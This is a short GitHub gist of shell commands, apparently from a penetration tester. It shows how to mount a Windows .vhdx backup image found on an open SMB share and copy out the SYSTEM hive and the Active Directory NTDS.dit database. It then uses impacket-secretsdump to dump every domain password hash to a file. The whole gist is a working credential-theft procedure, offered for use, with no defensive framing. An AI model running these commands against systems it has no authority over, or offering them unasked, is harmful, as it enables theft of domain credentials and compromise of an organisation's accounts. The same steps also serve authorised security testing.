Skip to content

Instantly share code, notes, and snippets.

@zimnyaa

zimnyaa/vhdx-on-smb-share.sh

Created January 19, 2022 12:02
Show Gist options
  • Save zimnyaa/d200686647f3b0297c548aba6dcea1b6 to your computer and use it in GitHub Desktop.
Save zimnyaa/d200686647f3b0297c548aba6dcea1b6 to your computer and use it in GitHub Desktop.
Download ZIP
Unpack .vhdx and decrypt ntds.dit (often used for backups and can be found on open SMB shares)
Raw
vhdx-on-smb-share.sh
# runs on kali out-of-the-box
# this is not a ready-made script, more like a collection of commands
# QEMU mounting a drive
modprobe nbd max_part=16
qemu-nbd -c /dev/nbd0 filename.vhdx
# look for the second partition, usually where the FS resides
fdisk -l /dev/nbd0
# mount the second partition
mount /dev/nbd0p2 /mnt/windows
# copy SYSTEM (for the bootkey) and NTDS.dit
cp /mnt/windows/Windows/System32/config/SYSTEM ~/SYSTEM
cp /mnt/windows/Windows/System32/NTDS/ntds.dit ~/ntds.dit
cd
# do not bother with esedbexport, impacket can do everything for us
impacket-secretsdump -ntds ~/ntds.dit -system ~/SYSTEM -hashes lmhash:nthash LOCAL -outfile hashes.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment